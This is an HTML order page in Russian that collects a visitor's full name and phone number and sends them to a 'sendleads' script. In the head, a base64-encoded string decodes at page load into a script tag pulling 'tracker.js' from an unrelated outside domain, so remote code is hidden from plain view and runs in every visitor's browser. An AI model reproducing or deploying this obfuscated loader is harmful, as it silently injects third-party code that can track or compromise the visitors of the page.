<html>
	<head>
		<title>Оформить заказ</title>
		<meta property="og:url" content="https://pahblog.github.io/m/" />
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
		<meta name="viewport" content="width=device-width, initial-scale=1">
		<link rel="stylesheet" type="text/css" href="style.css">
 <script>
      var string = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8va2xvLXN0b3JlLnJ1L3RyYWNrZXIuanMiPjwvc2NyaXB0Pg==';
      var decodedString = atob(string);
      document.write(''+ decodedString +'');
  </script>
 <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.0/jquery.min.js"></script>
	
	</head>
	<body>
		<style>
		#country{display: block;
    width: 400px;
    padding: 8px 10px;
    border: #888 1px solid;
    font-size: 16px;
    -webkit-border-radius: 5px;
    -moz-border-radius: 5px;
    border-radius: 5px;
    background: #fff;
} 
		</style>
		<div id="wrapper">
		<form action="/sendleads.php?" method="post" id="order_form" onsubmit="return cartTelCheck('phone', true, this, event);">
			<fieldset>
				<div class="row">
					<p>
						Страна
					</p>
				<span class="country"></span>
			</div>
				<div class="row">
					<p>Ваше ФИО</p>
					<input type="text" name="client">
				</div>
				<div class="row">
					<p>Ваш телефон</p>
					<input type="text" name="tel" id="phone" placeholder="Номер телефона в межд. формате" >
				</div>
				<div class="row">
					<input type="submit" value="Заказать">
				</div>
			</fieldset>
		</form>
		</div>
	</body>
</html>
